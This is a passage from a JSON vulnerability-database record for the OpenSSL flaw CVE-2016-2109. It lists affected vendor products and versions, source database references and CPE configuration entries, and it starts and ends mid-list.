        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.02"
      },
      {
        "model": "prime collaboration provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "network analysis module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0"
      },
      {
        "model": "websphere application server liberty profile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.5"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.4"
      },
      {
        "model": "unity connection",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "telepresence video communication server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.8"
      },
      {
        "model": "lancope stealthwatch flowcollector netflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "lancope stealthwatch smc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.2"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(1.98991.13)"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.2.0"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "abyp-10g-2sr-2lr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "prime optical for sps",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.6"
      },
      {
        "model": "telepresence mcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "45000"
      },
      {
        "model": "telepresence server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "87104.4"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1.0.0"
      },
      {
        "model": "telepresence isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32410"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.4"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50008.3"
      },
      {
        "model": "10.1-release-p31",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0"
      },
      {
        "model": "tivoli netcool system service monitors interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.12-04"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.2.1"
      },
      {
        "model": "netflow generation appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pureapplication system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.2.3"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.9.2"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3104.1"
      },
      {
        "model": "telepresence ex series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings server ssl gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-2.7"
      },
      {
        "model": "telepresence server on virtual machine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.6"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.5"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5"
      },
      {
        "model": "webex meetings for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(1.10000.5)"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.6"
      },
      {
        "model": "tivoli composite application manager for transactions if37",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.1"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.6"
      },
      {
        "model": "tivoli network manager ip edition fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.94"
      },
      {
        "model": "prime license manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "commerce experience manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.0"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3376"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "messagesight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.3"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.18-42"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70002.8"
      },
      {
        "model": "expressway series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.8"
      },
      {
        "model": "abyp-4t-0s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "email security appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.2"
      },
      {
        "model": "virtual security gateway for microsoft hyper-v vsg2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "connected grid router cgos 15.6.2.15t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "wide area application services",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.2.3"
      },
      {
        "model": "9.3-release-p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "tivoli netcool system service monitors interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.12-01"
      },
      {
        "model": "unified intelligent contact management enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.1"
      },
      {
        "model": "nexus series switches 7.3.1nx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6000"
      },
      {
        "model": "application and content networking system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mmp server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.9.1"
      },
      {
        "model": "project openssl 1.0.1k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "9.3-release-p39",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "anyconnect secure mobility client for ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-114"
      },
      {
        "model": "telepresence mx series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.5"
      },
      {
        "model": "spa232d multi-line dect ata",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.4.5"
      },
      {
        "model": "linux -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "tivoli provisioning manager for images build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.20290.1"
      },
      {
        "model": "project openssl 1.0.1b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "telepresence profile series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.13"
      },
      {
        "model": "anyconnect secure mobility client for os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "x4.2"
      },
      {
        "model": "tivoli netcool system service monitors interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.014-08"
      },
      {
        "model": "lancope stealthwatch udp director",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8"
      },
      {
        "model": "universal small cell series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70003.5.12.21"
      },
      {
        "model": "telepresence conductor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application policy infrastructure controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jabber for mac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "globalprotect agent",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1.1"
      },
      {
        "model": "dcm series 9900-digital content manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "19.0"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.2.0"
      },
      {
        "model": "10.3-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "security access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "video surveillance 4300e/4500e high-definition ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1876"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.0"
      },
      {
        "model": "10.3-release-p2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "unified ip phone 9.4.2sr3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9951"
      },
      {
        "model": "local collector appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2.12"
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.1"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.32"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.0"
      },
      {
        "model": "content security appliance updater servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.1-release-p29",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "connected analytics for collaboration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "multicast manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.1-release-p23",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "lancope stealthwatch flowcollector netflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.7.3"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "telepresence ex series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3.7"
      },
      {
        "model": "mac os security update",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x2016"
      },
      {
        "model": "10.1-release-p16",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "jazz reporting service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.1"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.1"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50006.2.17"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.30.4-12"
      },
      {
        "model": "webex node for mcs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "emergency responder 10.5",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.0"
      },
      {
        "model": "qradar siem mr2 patch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.113"
      },
      {
        "model": "unified communications manager session management edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nexus",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "900012.0"
      },
      {
        "model": "lancope stealthwatch udp director",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.1"
      },
      {
        "model": "9.3-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "video surveillance ptz ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "virtualization experience media engine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.7(0)"
      },
      {
        "model": "telepresence serial gateway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "9.3-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.3"
      },
      {
        "model": "project openssl 1.0.2c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "webex meetings server 2.5mr2",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "virtual security gateway for microsoft hyper-v",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "services analytic platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jabber for apple ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.7"
      },
      {
        "model": "unified ip phone series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "79009.4(2)"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "89610"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60006.2.17"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.12"
      },
      {
        "model": "tivoli netcool system service monitors",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.2"
      },
      {
        "model": "unified series ip conference phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "88310"
      },
      {
        "model": "video surveillance media server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.9"
      },
      {
        "model": "unified communications manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "agent for openflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.1.5"
      },
      {
        "model": "10.2-release-p16",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "project openssl 1.0.2h",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "virtual security gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(1)"
      },
      {
        "model": "unified attendant console enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified contact center express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3379"
      },
      {
        "model": "policy suite",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2"
      },
      {
        "model": "project openssl 1.0.2b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "prime data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "unified communications manager session management edition",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "videoscape control suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence mcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "53000"
      },
      {
        "model": "prime access registrar",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.1"
      },
      {
        "model": "anyres live",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.4.5"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.3.0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.0"
      },
      {
        "model": "9.3-release-p34",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0(1)"
      },
      {
        "model": "tivoli provisioning manager for images system edition build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x7.1.1.20290.1"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.10"
      },
      {
        "model": "jabber software development kit",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.7"
      },
      {
        "model": "unified contact center express",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "webex meetings server mr1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.0.0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.99.2"
      },
      {
        "model": "telepresence mx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.1"
      },
      {
        "model": "jazz reporting service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0"
      },
      {
        "model": "telepresence isdn gw mse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "83210"
      },
      {
        "model": "telepresence profile series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "abyp-2t-0s-2l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "visual quality experience tools server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "prime access registrar",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.2"
      },
      {
        "model": "nexus series switches 7.3.1dx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7000"
      },
      {
        "model": "asa cx and cisco prime security manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.5.4.3"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "project openssl 1.0.1l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "im and presence service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3"
      },
      {
        "model": "9.3-release-p29",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "firesight system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "management appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.2"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.2"
      },
      {
        "model": "tivoli provisioning manager for images system edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x7.1.1.0"
      },
      {
        "model": "unity connection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.0.1"
      },
      {
        "model": "cloud object store",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "anyconnect secure mobility client for os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "x4.0"
      },
      {
        "model": "project openssl 1.0.1h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(2.13900.9)"
      },
      {
        "model": "ip interoperability and collaboration system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(0.98000.88)"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.1"
      },
      {
        "model": "project openssl 1.0.1p",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "87940"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2109"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "1.0.1s",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
